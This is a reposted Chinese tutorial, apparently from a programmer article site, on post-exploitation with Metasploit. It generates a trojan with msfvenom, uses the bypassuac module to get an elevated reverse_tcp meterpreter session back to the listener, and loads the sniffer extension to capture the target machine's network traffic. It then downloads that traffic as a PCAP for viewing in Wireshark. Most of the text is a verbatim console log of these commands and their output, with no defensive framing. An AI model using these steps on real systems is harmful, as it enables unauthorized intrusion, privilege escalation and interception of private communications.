欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

msf中内网抓取本机数据包

程序员文章站 2022-07-10 10:26:46
1,使用msf,利用msfvenom生成木马程序,在win7 sp1测试通过.(http://www.2cto.com/Article/201304/199847.html) 2,使用sni...

1,使用msf,利用msfvenom生成木马程序,在win7 sp1测试通过.(http://www.2cto.com/Article/201304/199847.html

2,使用sniffer模块

在win7 下要多加一步,就是过UAC.这里利用 exploit/windows/local/bypassuac

另外还有一个工具可以使用,不过没测:Win7Elevate32.exe

Bypass UAC: http://www.metasploit.com/modules/exploit/windows/local/bypassuac

view source01 meterpreter > background 

02 [*] Backgrounding session 6... 

03 msf  exploit(handler) > use exploit/windows/local/bypassuac 

04 msf  exploit(bypassuac) > show options 

05   

06 Module options (exploit/windows/local/bypassuac): 

07   

08    Name     Current Setting  Required  Description 

09    ----     ---------------  --------  ----------- 

10    SESSION  4                yes       The session to run this module on. 

11   

12 Payload options (windows/meterpreter/reverse_tcp): 

13   

14    Name      Current Setting  Required  Description 

15    ----      ---------------  --------  ----------- 

16    EXITFUNC  process          yes       Exit technique: seh, thread, process, none 

17    LHOST     192.168.0.133    yes       The listen address 

18    LPORT     443              yes       The listen port 

19   

20 Exploit target: 

21   

22    Id  Name 

23    --  ---- 

24    0   Windows 

25   

26 msf  exploit(bypassuac) > set SESSION 6 

27 SESSION => 6 

28 msf  exploit(bypassuac) > exploit 

29   

30 [*] Started reverse handler on 192.168.0.133:443  

31 [*] UAC is Enabled, checking level... 

32 [+] UAC is set to Default 

33 [+] BypassUAC can bypass this setting, continuing... 

34 [*] Checking admin status... 

35 [+] Part of Administrators group! Continuing... 

36 [*] Uploading the bypass UAC executable to the filesystem... 

37 [*] Meterpreter stager executable 73802 bytes long being uploaded.. 

38 [*] Uploaded the agent to the filesystem.... 

39 [*] Sending stage (752128 bytes) to 192.168.0.103 

40 [*] Meterpreter session 7 opened (192.168.0.133:443 -> 192.168.0.103:2309) at 2013-04-02 00:34:51 +0800 

41   

42 meterpreter >  

43 meterpreter > pwd

44 C:\Windows\System32 

45   

46 meterpreter > use sniffer 

47 Loading extension sniffer...success. 

48 meterpreter > sniffer_interfaces  

49   

50 1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false ) 

51 2 - 'Intel(R) 82567LM Gigabit Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

52 3 - 'VMware Virtual Ethernet Adapter for VMnet1' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

53 4 - '11b/g/n  Wireless LAN Mini-PCI Express Adapter II' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) 

54 5 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 

55   

56 meterpreter > sniffer_start 4 

57 [*] Capture started on interface 4 (50000 packet buffer) 

58 meterpreter > sniffer_stats 4 

59 [*] Capture statistics for interface 4 

60     packets: 2 

61     bytes: 115 

62 meterpreter > sniffer_stats 4 

63 [*] Capture statistics for interface 4 

64     packets: 173 

65     bytes: 109330 

66 meterpreter > sniffer_dump 4 /tmp/mydump.cap 

67 [*] Flushing packet capture buffer for interface 4... 

68 [*] Flushed 225 packets (122383 bytes) 

69 [*] Downloaded 100% (122383/122383)... 

70 [*] Download completed, converting to PCAP... 

71 [*] PCAP file written to /tmp/mydump.cap 

72 meterpreter > sniffer_stop 4 

73 [*] Capture stopped on interface 4 

74 [*] There are 32 packets (6987 bytes) remaining 

75 [*] Download or release them using 'sniffer_dump' or 'sniffer_release'

76 meterpreter >

最后收集的网络数据包就可以用wireshark打开查看.找到感兴趣的内容